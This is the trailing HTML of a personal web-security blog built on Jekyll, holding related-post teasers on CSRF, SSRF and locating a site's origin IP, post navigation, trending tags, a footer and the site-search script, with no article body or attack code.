<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/csrf-guide" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1740268800"
  data-df="ll"
  
>
  Feb 23, 2025
</time>

              <h4 class="pt-0 my-2">Cross-Site Request Forgery (CSRF)</h4>
              <div class="text-muted">
                <p>Introduction to Cross-Site Request Forgery (CSRF)

What is Cross-Site Request Forgery (CSRF)?

Cross-Site Request Forgery (CSRF) is a web security vulnerability that tricks users into performing ac...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/ssrf-guide" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1738195200"
  data-df="ll"
  
>
  Jan 30, 2025
</time>

              <h4 class="pt-0 my-2">Server-Side Request Forgery (SSRF)</h4>
              <div class="text-muted">
                <p>Understanding Server-Side Request Forgery (SSRF)

What is SSRF?

Server-Side Request Forgery (SSRF) is a critical web security vulnerability that allows an attacker to induce a server-side applicat...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/find-origin-ip-website" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1736899200"
  data-df="ll"
  
>
  Jan 15, 2025
</time>

              <h4 class="pt-0 my-2">Discover the Origin IP Address of a Website and Identify WAF Protection</h4>
              <div class="text-muted">
                <p>Web application firewalls (WAFs) and content delivery networks (CDNs) are commonly employed to enhance website security. These technologies often obscure the true IP address of a server, adding an ...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/ffuf-Fuzzing-Guide"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>FFUF: Fuzzing Guide to Web Applications</p>
    </a>
  

  
    <a
      href="/posts/csrf-guide"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>Cross-Site Request Forgery (CSRF)</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://twitter.com/diogo-lages">Diogo Lages</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/python/">Python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/guides/">Guides</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/exploits/">Exploits</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web-pentesting/">Web Pentesting</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/csrf/">CSRF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tools/">Tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/2fa-bypass/">2FA Bypass</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/advanced-search/">Advanced Search</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/anonymity/">Anonymity</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/browser-extensions/">Browser Extensions</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

